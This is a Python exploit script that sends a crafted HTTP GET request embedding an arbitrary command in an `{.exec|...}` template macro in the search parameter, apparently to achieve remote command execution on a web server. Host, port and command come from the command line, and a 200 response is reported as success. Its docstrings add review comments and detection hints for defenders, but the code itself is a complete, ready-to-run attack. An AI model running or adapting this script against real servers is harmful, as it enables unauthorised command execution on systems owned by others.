exploit.py
import socket
import sys
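timeout_duration = 5  # socket timeout in seconds; applies to connect, send and recv


def send_request(host, port, cmd):
    """Send one crafted GET request to ``host:port`` and print the reply.

    The request embeds ``cmd`` inside an ``{.exec|...}`` template macro in
    the ``search`` query parameter. NOTE(review): this looks like a
    server-side template-macro injection probe; the affected product and
    advisory are not named anywhere in this file, so confirm them before
    relying on the result.

    Detection notes for defenders: the literal ``{.exec|`` in the request
    line and the empty ``Host:`` header are exactly what this function
    puts on the wire, so both can be matched in access logs or by network
    inspection.

    Args:
        host: Target host name or IP address, passed to ``socket.connect``.
        port: Target TCP port as an int.
        cmd: Text placed verbatim inside the ``{.exec|...}`` macro.

    Returns:
        None. The response and a status line are printed to stdout.
    """
    # Construct the HTTP request. `cmd` is concatenated as-is.
    request = (
        "GET /?search=%25x%25url%25:%host%}{.exec|"
        + cmd
        + ".}{.break.} HTTP/1.1\r\n"
        + "Host:\r\n\r\n"
    )

    # Create a TCP socket; the context manager closes it on every path.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout_duration)
        try:
            # Connect to the server
            s.connect((host, port))

            # Send the HTTP request
            s.sendall(request.encode())

            # Single read: only the first 4096 bytes of the reply are seen.
            response = s.recv(4096)

            # Decode once; replace undecodable bytes so a binary or
            # non-UTF-8 body cannot abort the run with UnicodeDecodeError.
            text = response.decode(errors="replace")
            print(text)

            # '200 OK' only shows that the server answered the request;
            # it does not by itself confirm that the macro was evaluated.
            if '200 OK' in text:
                print("[+] The exploitation seems to be successful.")
            else:
                # Negative outcome uses the "[-]" prefix, matching the
                # error messages below.
                print("[-] The exploitation seems NOT to be successful.")
        except socket.timeout:
            print("[-] The request timed out. Exiting...")
        except socket.error as e:
            print(f"[-] Socket error: {e}")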
if __name__ == "__main__":
    # Command-line entry point: exactly three operands are required
    # (host, port, cmd); anything else prints the usage line and exits 1.
    if len(sys.argv) != 4:
        print("Usage: python3 script.py <host> <port> <cmd>")
        sys.exit(1)

    host, port, cmd = sys.argv[1], int(sys.argv[2]), sys.argv[3]
    send_request(host, port, cmd)